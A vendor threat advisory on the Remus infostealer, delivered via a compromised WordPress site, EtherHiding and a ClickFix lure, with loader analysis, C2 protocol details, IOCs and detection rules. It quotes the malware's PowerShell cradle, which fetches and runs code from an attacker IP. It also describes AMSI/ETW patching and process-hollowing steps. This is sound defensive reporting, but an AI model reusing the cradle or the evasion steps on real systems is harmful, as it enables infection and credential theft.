TLP:CLEAR Threat: Known bad · 10/10

Remus Stealer (WP-002) via ClickFix & EtherHiding

Advisory SL-ADV-2026-WP-001 v15.3 — all v15.3 anchors verified against a live 2026-09-02 capture; loader→core→C2 linkage closed; one v15.3 error and one v15.1 error corrected
Author: Dispensight / SecureLeaf Contact: secureleaf.dispensight.com Published: 2026-09-02 Family: Remus (WP-002) Lure: hxxp://dorz[.]nl

Executive summary

A new wave of the WP-002 / Remus infostealer is being delivered through a compromised WordPress site (dorz[.]nl) that stages a ClickFix paste-and-run lure via a BSC-testnet EtherHiding contract. The chain terminates in a native x64 core injected fileless into a hollowed process, with a managed .NET collection component and RSA-wrapped HTTP exfiltration.

Versus prior waves, the delivery front-end was rebuilt (IExpress-SFX + AutoIt loader replacing the MZER/Donut branch), but the durable RSA-1024 C2 handshake key (dc4cb858…febfac6f, e=65537) is CONFIRMED — resolved in process memory across two independent detonations. Attribution is held at the infrastructure level; no named-group assertion.

v15.3 — consolidated. This release supersedes and fully contains v15.1 and v15.2. Corpus.a3x has been decompiled and its obfuscation resolved (§3); the terminal native core has been recovered from the loader itself rather than from a memory dump (§4); and every anchor has been checked against a live 2026-09-02 detonation capture with embedded TLS secrets (§5). Five earlier statements are corrected in §2 — including one Sigma rule that could never have fired, and one error of our own. The lure→loader→core→C2 chain is now continuous with no inferred links.

1 · Kill chain

Compromised lure — dorz[.]nl (WordPress/Elementor)

Injected page pulls a stage from a blockchain contract. The host itself is a victim (splitcam: never blocklisted).

EtherHiding — BSC-testnet — T1102

Contract 0xae5d8eec…08034 (selector 0xe2179b8e), read via data-seed-prebsc-1-s1.binance.org, returns base64 JS appending the asseload.com widget.

ClickFix stager — asseload.com · T1204.004

aps.js chain-loads a/9f2b4d03635c.js (XOR key oipCQd0DIbeF) — fake Cloudflare verify: Win+R → Ctrl+V → OK, poisoning the clipboard.

PowerShell download-cradle — T1059.001

powershell -w h -c "iex((New-Object Net.WebClient).DownloadString('hxxp://193.221.200.66:4139/tools/soft/coms'))"

IExpress SFX → AutoIt loader — T1027 · T1140

IntroductionChassis.exe drops legit AutoIt3.exe + packed Corpus.a3x; runs AutoIt3.exe Corpus.a3x.

Guardrails & telemetry blinding — T1497 · T1562.001 · T1518.001

v15.3 VM/sandbox exit, NXDOMAIN sentinel resolver test, AV-conditioned dwell, clean-ntdll rebuild from \KnownDlls\, AMSI + 4×ETW export patching. Full detail in §3.

Stage unwrap — T1140 · T1106

v15.3 138,055-byte embedded blob → RC4 (PIC stub via DllCallAddress) → LZNT1 (RtlDecompressFragment) → 227,328-byte PE32+.

Process hollowing — T1055.012 · T1134.004 · T1036.005

CORRECTED Target is a second copy of AutoIt3.exe, falling back to System32\TapiUnattend.exe — not a browser. CREATE_SUSPENDED + PPID-spoof under explorer.exe; primary thread redirected with NtSetContextThread/NtResumeThread.

Collection — T1113 · T1564 · T1555.003 · T1005

Managed .NET component reads browser profile/credential stores and enumerates cryptocurrency wallet artifacts. Firefox profile access observed.

Exfiltration — T1071.001

POST /invoices to 209.38.82.72:9048 (cdire[.]shop), Host: github.com spoof. Body schema rotated between waves (access_token/debug → tag/exp/hwid).

Persistence — unattributed stage

DOWNGRADED No persistence primitive exists in the a3x. If present in this wave it belongs to the SFX or the PowerShell stage.

2 · Corrections

Five statements carried in earlier releases are contradicted by the decompiled Corpus.a3x or by the 2026-09-02 capture. All five are corrected here and in the shipped rulesets rather than quietly dropped — including one that was our own error. Superseded rules are retained in downgraded form so downstream consumers can see what changed.

v15.1 saidv15.3 findingImpact
Native core is hollowed into a browser process. The loader hollows @AutoItExe — a second copy of the AutoIt interpreter — and falls back to %SystemRoot%\System32\TapiUnattend.exe on retry or when bdagent.exe is present. No browser is referenced anywhere in the loader. 0x140000000 is simply the payload's own ImageBase, not a browser-specific artefact. detection Hunts scoped to browser processes miss this wave entirely.
Sigma …00004: create_remote_thread with SourceImage = AutoIt3.exe. The loader never calls CreateRemoteThread. It creates the target suspended and redirects the already-existing primary thread. Sysmon EID 8 cannot fire. rule was inert Replaced with EID 25 (ProcessTampering) + EID 10.
Persistence via Task Scheduler COM / at.exe. No at.exe, no schtasks, no Run key, no service, no startup-folder write, no COM task registration — the a3x contains no persistence code path at all. status Rule …00008 downgraded to informational / unsupported, retained for continuity. Source: a3x — re-confirmed by the capture, the PowerShell stager contains no persistence either.
Build tag is the 33-character string d355039c…c375f. The tag is 32 characters: 355039cceb3bd77c4ef50905dc6c375f. The leading d was adjacent binary data picked up by a strings run over .rdata, not part of the constant. our error The 33-char YARA string and STIX pattern would not have matched the wire value. Both corrected; $tag also drops fullword, since in .rdata the constant abuts binary data. Source: capture.
C2 body schema “rotated between waves”. Two urlencoded schemas plus a multipart form — message types of one protocol, all present in a single session (§5.3). under-match A rule requiring one schema and not the other under-matches by design. Source: capture.
Payload host exposes /tools/soft/coms. Also /tools/soft/file, serving a 1.6 MB ZIP as text/plain. coverage Content-type/content mismatch is an independent proxy signal. Source: capture.
Build divergence — the v15.1 YARA core rule would miss this wave. The image embedded in the a3x (build B) shares ImageBase 0x140000000 and the same entry-point RVA 0x21c0 as the v15.1 dumped image (build A), but the code differs: build A's prologue anchor 8D 48 08 E9 does not appear at build B's entry point, which is 48 83 EC 58 B9 <imm32> E8. Build B is timestamped 2026-08-28, five days before publication. v15.1's rule is retained, rescoped to build A and anchored at pe.entry_point (the floating 4-byte match was FP-prone); a new rule covers build B.

3 · The AutoIt loader — Corpus.a3x

3.1 Obfuscation profile

The decompiled script is ~19,300 lines of machine-generated AutoIt. Four traits define the obfuscator, and they are family-level rather than campaign-level — expect them on unrelated samples using the same commodity packer:

TraitDetail
Control-flow flatteningEvery function body is a While loop wrapping a Switch over a state variable; each Case label is an arithmetic expression (BitXOR(0x…, 0x…), BitShift, multi-term hex sums) and each block ends by adding another computed constant to the state variable.
Single string-decode chokepointEvery literal in the file — API names, DLL names, struct definitions, paths — is stored as a hex blob plus a short alphabetic key and routed through one decode function. That function is a repeating-key XOR over the ANSI-decoded bytes. 12,987 call sites, 2,985 distinct plaintexts. The function name is randomised per build, so it is not itself an anchor; the call shape is.
Junk fillerThousands of no-op DllCalls (GetSystemMetrics, IsProcessorFeaturePresent, PathIsDirectoryW against random strings, CloseHandle on integer literals) and Execute("<builtin>('<random>')") statements interleaved with dead arithmetic on undefined variables.
Identifier schemeVariables and functions are concatenated English dictionary words ($competitorsprevvictorfleece, ADAPTERSLLOYD), regenerated per build. Do not signature on identifier names.

3.2 Execution guardrails

The loader branches on its environment before doing anything. Note that most branches adapt rather than abort — a sandbox that only watches for a clean exit will miss it.

CheckBehaviourATT&CK
vmtoolsd.exe · VboxTray.exe · SandboxieRpcSs.exe Immediate Exit.T1497.001
NXDOMAIN sentinel — resolve microsoft.com (must succeed), then a fixed nonsense FQDN built by repeating one 25-character label (must fail) If the sentinel resolves, the resolver is treated as a wildcard/sinkhole analysis environment and the loader aborts.T1497.001
avastui.exeSleep ≈20 s, then TrayIconHide.T1497.003
bdagent.exeSleep ≈160 s and switch the hollowing target to TapiUnattend.exe.T1497.003 · T1036.005
avp.exeDrop EXTENDED_STARTUPINFO_PRESENT from the creation flags (0x8080004 → 0x8000004), i.e. skip the PPID spoof that Kaspersky flags.T1518.001
PEB BeingDebugged; QueryPerformanceCounter/Frequency deltas; VirtualAllocExNuma in place of VirtualAllocEx Emulator/hook differentiation.T1497.001
Highest-value host anchor in this release. The sentinel label BLKcXXxNNJsPfGATrtzbZZxCm is a build-time constant appearing twice in one FQDN. A DNS query for it has no benign explanation. It is shipped as Sigma …00009 at level: critical and as a standalone YARA rule. Operational note for our own pipeline: if a sinkhole or wildcard resolver in the detonation path answers this label, the loader will refuse to stage — detonate on a resolver that returns a genuine NXDOMAIN.

3.3 Telemetry blinding

Before injection the loader obtains a hook-free ntdll by two independent routes, then patches user-mode telemetry in that fresh image:

StepMechanism
Clean ntdll — route 1NtOpenSection + NtMapViewOfSection against \KnownDlls\ntdll.dll (\KnownDlls32\ntdll.dll on WoW64).
Clean ntdll — route 2CreateFileA on %SystemRoot%\System32\ntdll.dll → CreateFileMappingA with SEC_IMAGE|PAGE_READONLY (0x1000002) → MapViewOfFile.
AMSIGetModuleHandleA("amsi.dll") → GetProcAddress("AmsiScanBuffer") → in-place prologue patch. Skipped when amsi.dll is not loaded.
ETWEtwEventWrite, EtwEventWriteFull, EtwEventWriteEx, and on x64 EtwEventWriteTransfer — four exports patched in the freshly mapped image.

Consequence: user-mode ETW-sourced EDR telemetry from the loader process and its child is unreliable after this point. Kernel-sourced Sysmon events (EID 1, 10, 25) and DNS/proxy telemetry are the surviving observation surface — which is why §5's rules are built on those.

3.4 Stage unwrap

StageDetail
StorageOne AutoIt string assembled from 159 hex-literal concatenations (1,728 chars each) — 138,055 bytes, SHA-256 5f21239e…8b4108. No FileInstall, no dropped intermediate file.
Layer 1 — RC4Key is a 35-digit ASCII numeric literal (57289866…480987) passed through Binary(). The cipher itself is not written in AutoIt: KSA and PRGA ship as position-independent x86 and x64 stubs stored as hex literals and invoked through DllCallAddress after VirtualAlloc/VirtualProtect. Branch selected on @AutoItX64.
Layer 2 — LZNT1RtlGetCompressionWorkSpaceSize + RtlDecompressFragment with COMPRESSION_FORMAT_LZNT1 (format 2).
Result227,328-byte PE32+ — see §4.

3.5 Injection

StepDetail
Target selection@AutoItExe by default; on retry (or with bdagent.exe present) %SystemRoot%\System32\TapiUnattend.exe. The routine retries in a loop, calling ProcessClose on the target's basename between attempts.
Child creationCreateProcessW(NULL, "<target> <token>", …, dwCreationFlags = 0x8080004) = CREATE_SUSPENDED | CREATE_NO_WINDOW | EXTENDED_STARTUPINFO_PRESENT. The <token> argument is derived from the loader's own @AutoItPID and acts as a handshake for the injected image.
PPID spoofOnly when not elevated: OpenProcess(MAXIMUM_ALLOWED) on explorer.exe → UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_PARENT_PROCESS). The child therefore reports Explorer as its parent.
MappingNtUnmapViewOfSection → VirtualAllocExNuma at the preferred base 0x140000000 → per-section NtWriteVirtualMemory → relocation processing → NtProtectVirtualMemory.
Hand-offNtSetContextThread on the suspended primary thread, then NtResumeThread. No CreateRemoteThread, no QueueUserAPC.
WoW64IsWow64Process, NtWow64QueryInformationProcess64, NtWow64ReadVirtualMemory64 — a 32-bit interpreter can inject into a 64-bit target. Both x86 and x64 CONTEXT and PEB layouts are carried.
Not present in the a3x — stated for the record. No persistence of any kind; no C2 address, URL or domain; no RSA key material; no browser, wallet or credential path; no mutex; no registry write; no file write. The loader's entire job is guardrails → unwrap → inject. Every network and collection behaviour attributed to WP-002 belongs to the injected core or to an earlier stage.

4 · Terminal native core — recovered from the loader

The image was recovered statically by unwrapping the a3x blob, so this is a pre-execution artefact, not a memory dump. Its capability profile matches the v15.1 dumped image; its bytes do not.

PropertyValue
FormatPE32+ x64, GUI subsystem, 4 sections, 227,328 bytes
SHA-2566e3e5e0d169a79e148f0e73bfee7cad84370069ca9fbedd69e506ffb7780fce9
MD53624cb665a45bdea14b3e5065121ab1b
imphash754318d99f6bf9d00342a1a491eb8242
ImageBase / EP RVA0x140000000 / 0x21c0
Compile timestamp2026-08-28 11:51:22 UTC
.text SHA-25611e2d6f7272175f6f2c4ed794c0d94c39b8b8a1ffe180bf3b1dedaa71584ff94
.rdata SHA-256 / entropy0231035731ceeb06826b433bbebeb2967f1289b1e9a5e51a511b9072bf04ed45 · 7.37 (sealed config)
Build markers in .rdata355039cceb3bd77c4ef50905dc6c375f (32-char lowercase hex, build/campaign tag — sent verbatim as the C2 tag= field) and 28.08.2026 (build date, matching the PE timestamp)
Managed codeNone — CLR directory empty. This stage is fully native.

The import surface is consistent with the v15.1 profile — 36 imports across KERNEL32 · ole32 · USER32 · ADVAPI32 · GDI32 · OLEAUT32: screen capture (BitBlt, GetDIBits, CreateCompatibleDC/Bitmap, GetWindowDC), hidden-desktop interaction (CreateDesktopW, OpenDesktopW, CloseDesktop, EnumDisplaySettingsW), COM/BSTR handling, host fingerprinting (GetComputerNameA/ExA, GetUserNameA, GetKeyboardLayout, GetKeyboardLayoutNameA/W), privilege lookup and clipboard/global-memory handling.

No network imports. The exfil stack documented in §6 is not in this image's IAT — no WinINet, WinHTTP or Winsock. Combined with the 7.37-entropy .rdata, the network layer and the target lists are resolved at runtime, which is the same runtime-keyed sealing first documented in v14.x. Static recovery of the C2 from this artefact is not expected and was not achieved. However — see §5 — the 32-character build tag in this image's .rdata is transmitted verbatim as the tag= field of the C2 registration beacon. The cdire[.]shop attribution is therefore no longer capture-only inference: this file and that C2 session are linked by a shared constant.

5 · Wire verification — 2026-09-02 detonation

Capture: 23,343 frames over 186 s, victim 10.127.0.26, resolver 8.8.8.8, TLS secrets embedded as a DSB block (17,119 bytes of keylog). Timings below are relative to the first frame.

5.1 Timeline

t (s)EventStatus
5.2dorz[.]nl → 209.42.255.100; WordPress/Elementor page loads (hello-elementor theme, elementor-pro)confirms v15.1
8.7–8.9BSC-testnet RPC: eth_chainId → 0x61 (testnet 97), eth_blockNumber, then eth_call to 0xae5d8eec6ea8366e7922c93abc908ff96eb08034 with data: 0xe2179b8eexact match
9.6asseload[.]com → 104.21.59.52, 172.67.214.143; TLS connection carries SNI cloudflare-ech.comnew — ECH
82.7GET 193.221.200.66:4139/tools/soft/coms → 243 B text/plainconfirms v15.1
82.8GET 193.221.200.66:4139/tools/soft/file → 1,621,425 B, served text/plain, actually a ZIPnew URI
86.63Sentinel query BLKcXXxNNJsPfGATrtzbZZxCm.BLKcXXxNNJsPfGATrtzbZZxCm → rcode 3 (NXDOMAIN)VERIFIED
86.66microsoft.com → NOERROR, 150.171.109.36VERIFIED
101.8cdire[.]shop → 209.38.82.72confirms v15.1
102.2First POST /invoices — the registration beaconconfirms v15.1
166.1Single multipart/form-data upload of 2,125,839 bytesnew
The §3.2 sentinel claim is now observed, not inferred. It fired exactly as the decompiled loader predicted, and the resolver returned NXDOMAIN, which is why staging proceeded. One nuance for rule authors: on the wire the sentinel is queried ~27 ms before microsoft.com — the reverse of the order the two calls appear in the source. Do not build a sequence rule that assumes source order.

5.2 The stager, recovered in full

/tools/soft/coms (SHA-256 64aa3e37…7426) is six lines of PowerShell. It supplies the host artefacts every prior version of this advisory was missing:

%APPDATA%\c.zip          <-- downloaded from /tools/soft/file
%APPDATA%\c\             <-- Expand-Archive -Force destination, archive then deleted
%APPDATA%\c\IntroductionChassis.exe   <-- Start-Process target

The archive (SHA-256 97860fba…45b5) contains exactly one file: IntroductionChassis.exe, SHA-256 2a1d78fb…9787680 — byte-identical to the SFX hash carried since v15.1. The delivery chain is now continuous from lure to loader with no inferred links.

5.3 C2 protocol — v15.1 corrected

v15.1 described the body schemas as rotating between waves. They do not rotate: they are message types of a single protocol, and all of them appear inside this one 90-second session.

MessageBodyCountPurpose
Registrationtag=355039cc…c375f · exp=1787902294 · hwid=32 hex1Check-in. tag is the build constant from the core's .rdata; exp is a fixed epoch (2026-08-28 07:31:34 UTC, ~4.3 h before the PE compile timestamp) — not an expiry relative to run time.
Step markeraccess_token=GUID · step=1…77Sequential progress markers.
Statusaccess_token=GUID · debug=hex blob69Opaque, ~30–90 B.
Bulk uploadmultipart/form-data: parts access_token, type (0/1/2), file with filename="data", application/octet-stream6Encrypted collected data; boundary is random alphanumerics of varying length (8–15 observed). Largest: 2,125,839 B.

Session token for this run: 794698e3-63ed-487d-b7c4-c265b706737d (per-run, not durable). Request header order is Cache-Control · Connection · Pragma · Content-Type · Host · User-Agent · Content-Length — Host in fifth position, which no mainstream browser or WinHTTP default produces.

The C2 answers 405 to everything. All 83 POSTs drew HTTP/1.1 405 Method Not Allowed, Server: nginx — 74 of them the stock 150-byte nginx error page — and the client kept uploading regardless, including the 2.1 MB body. A host streaming megabytes into an endpoint that rejects the method every single time is a strong standalone heuristic that survives rotation of the URI, the spoofed Host and the destination. Shipped as Sigma …00015.

5.4 Blocking guidance arising

Blocking guidance for asseload[.]com — read before acting. The stager is reached over Encrypted Client Hello: the TLS handshake carries SNI cloudflare-ech.com, not the real name. SNI-based inspection and blocking will not see it. Its A records (104.21.59.52, 172.67.214.143) are shared Cloudflare addresses — blocking them by IP would take down unrelated sites. Enforce by DNS name / RPZ only. The same caution applies to any Cloudflare-fronted indicator in this advisory.

6 · Forensic confirmations & honest gaps

Durable RSA-1024 anchor — CONFIRMED, and now explained. CAPI PUBLICKEYBLOB (modulus SHA-256 dc4cb858…febfac6f, e=65537) resolved in the PowerShell stage memory across two independent detonations. v15.3 confirms it is absent from the a3x by construction — the loader contains no key material at all, which is why on-disk and wire hunts came up empty.
Stage unwrap — CONFIRMED end to end. RC4 key and LZNT1 layer recovered; the resulting PE parses cleanly and its EP RVA matches the base/EP pair reported in v15.1. The loader→core linkage is now direct evidence, not inference.
New C2 confirmed independently. cdire[.]shop → 209.38.82.72:9048, resolved directly from the packet capture. Same /invoices, same github.com host-spoof. v15.3: now corroborated — the registration beacon carries the build tag found in the recovered core's .rdata.
Loader front-end diverged. No MZER prologue; SFX imphash 4cea7ae8… matches neither prior WP-002 anchor. Delivery was rebuilt while the terminal family and C2 key held.
Two native-core builds, one family. Build A (v15.1, memory-dumped) and build B (v15.3, a3x-embedded) share base, EP RVA, module set and capability profile but not bytes. Treat them as sibling builds; do not merge their hashes.
Open — unattributed persistence. Persistence is observed in this campaign but is not in the a3x. The PowerShell stager is now fully recovered and contains no persistence either — it downloads, expands, launches and stops. The gap has narrowed to the SFX and the injected core, and remains open.
Open — the token argument. The PID-derived token passed on the hollowed child's command line is consumed by the injected core. Its derivation is recoverable from the loader; its use is not, without dynamic analysis of the core.
Target list remains runtime-keyed by design. Re-confirmed, not a first observation: AES-decrypted at use-time through an OLEAUT32 BSTR allocate→use→free cycle, so it never exists as a durable contiguous string. Bounded to the import surface and host telemetry.

7 · Indicators of compromise

Network

TypeValueRoleHandling
domainBLKcXXxNNJsPfGATrtzbZZxCm[.]BLKcXXxNNJsPfGATrtzbZZxCmv15.3 NXDOMAIN sentinel — loader-side resolver testDETECT ONLY — do not sinkhole, do not resolve
domaincdire[.]shopRemus C2 (new)block
ipv4209.38.82.72:9048Remus C2 (2 waves)block
domainasseload[.]comClickFix stagerblock
ipv4193.221.200.66:4139PS dropper + ZIP hostblock
eth0xae5d8eec…08034EtherHiding contracttrack
urlhxxp://dorz[.]nl/Compromised lureVICTIM — notify, do not block

Host / file

TypeValueNote
sha2562a1d78fb…9787680IntroductionChassis.exe (IExpress SFX)
sha25674a517b6…7a4a67fCorpus.a3x (compiled AutoIt, packed)
sha25692c6531a…733f9f45AutoIt3.exe (legit interpreter, abused LOLBin)
sha25697860fba…45b5v15.3 Stager ZIP from /tools/soft/file (1,621,425 B, served as text/plain)
sha25664aa3e37…7426v15.3 PowerShell body from /tools/soft/coms (243 B)
path%APPDATA%\c.zip · %APPDATA%\c\IntroductionChassis.exev15.3 Stager drop paths (names may rotate)
uri/tools/soft/filev15.3 Second URI on the payload host
sha2565f21239e…8b4108v15.3 RC4-wrapped blob as embedded in the a3x (138,055 B)
sha2566e3e5e0d…780fce9v15.3 Native core build B, unwrapped (227,328 B)
sha256 (.text)11e2d6f7…584ff94v15.3 Build B .text — use once manually mapped
imphash754318d9…1eb8242v15.3 Build B
sha256 (.text)eba3f014…4c138Native core build A (v15.1 dump) — distinct build, retain separately
string355039cceb3bd77c4ef50905dc6c375fCORRECTED Build/campaign tag in core .rdata and the C2 tag= value — 32 chars, not 33
string57289866169362989668663919390480987v15.3 RC4 stage key; source/script-memory anchor only
path%SystemRoot%\System32\TapiUnattend.exev15.3 Fallback hollowing target (legitimate binary — detect execution, do not remove)
modulusdc4cb858…febfac6fDurable RSA-1024 C2 key (e=65537), runtime-resolved

8 · Detection

Full rulesets ship alongside this advisory: YARA (SL-ADV-2026-WP-001-V15.3.yar, 15 rules), Sigma (SL-ADV-2026-WP-001-V15.3_sigma.yml, 15 rules), and a STIX 2.1 bundle (SL-ADV-2026-WP-001-V15.3_stix.json, 89 objects with kill-chain relationships).

Highest-value discriminators

Host — a DNS query for the sentinel label. There is no benign explanation; it is a build-time constant and it appears twice in the same FQDN:

QueryName: BLKcXXxNNJsPfGATrtzbZZxCm.BLKcXXxNNJsPfGATrtzbZZxCm
           ^-- fixed 25-char label, repeated. Loader ABORTS if this resolves.
           Sigma ...00009 (critical) · YARA WP002_AutoIt_loader_nxdomain_sentinel

Host — execution of a binary that essentially never runs, or an interpreter parenting itself with a bare token:

Image      : C:\Windows\System32\TapiUnattend.exe     (takes no arguments; any execution is signal)
ParentImage: ...\AutoIt3.exe                          (or explorer.exe, if the PPID spoof landed)

ParentImage: ...\AutoIt3.exe
Image      : ...\AutoIt3.exe
CommandLine: "...\AutoIt3.exe" <token>              (no .au3/.a3x path -> not a normal relaunch)

Network — the exfil beacon spoofs Host: github.com while connecting to a non-GitHub IP:

POST /invoices HTTP/1.1
Host: github.com          <-- spoofed; destination is 209.38.82.72 / cdire.shop
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) ... Chrome/117.0.0.0
Content-Type: application/x-www-form-urlencoded

tag=<hex>&exp=<epoch>&hwid=<hex>    (variant-2; variant-1 = access_token=<guid>&debug=<hex>)
Telemetry caveat. Because the loader patches AMSI and four ETW write exports in a freshly mapped ntdll, user-mode ETW-derived EDR events from the loader and its child are unreliable. Rules …00009–…00012 deliberately sit on DNS, Sysmon EID 1/10/25 and proxy telemetry for that reason. Absence of EDR alerts is not absence of compromise here.

9 · Recommended actions

PriorityAction
nowDeploy Sigma …00009 (sentinel DNS) — single highest-confidence indicator in this release; retro-hunt 90 days of DNS logs.
nowBlock C2 209.38.82.72, cdire[.]shop, stager asseload[.]com, payload host 193.221.200.66.
nowAlert on POST /invoices + spoofed Host: github.com to non-GitHub destinations.
nowReplace any v15.1 detection scoped to browser-process hollowing or to CreateRemoteThread from AutoIt3.exe — both are inert against this wave (§2).
soonAlert on any execution of TapiUnattend.exe, and on AutoIt3.exe parenting AutoIt3.exe with a bare token argument.
soonEnable Sysmon EID 25 (ProcessTampering) and EID 10 if not already collected; they are the surviving hollowing telemetry once ETW is patched.
soonHunt powershell -w h … DownloadString cradles; memory-scan suspect hosts for the build tag 355039cc…c375f.
coordNotify dorz[.]nl host/registrar (.nl abuse) — victim cleanup, not blocklisting.
labDetonate on a resolver returning genuine NXDOMAIN — a wildcard or sinkholing resolver will cause the loader to abort before staging.

Attribution stance: infrastructure-level only; no named-group or nation-state assertion. Splitcam rule: compromised lure/victim hosts are never added to blocklists. Provenance: §3 and §4 are derived from static analysis of the decompiled Corpus.a3x and from the core recovered out of it. Network indicators remain capture-sourced and are explicitly not corroborated by those artefacts. The runtime-keyed target-list sealing and the OLEAUT capability profile are re-confirmations of findings first established in v14.x. All five corrections are collected in §2, one of which is an error of our own, corrected here rather than quietly amended. Superseded rules are retained in downgraded form rather than deleted, so downstream consumers can see what changed. This document consolidates and supersedes v15.1 and v15.2; no indicator or rule from either has been dropped.

SL-ADV-2026-WP-001 v15.3 · TLP:CLEAR · Dispensight / SecureLeaf · secureleaf.dispensight.com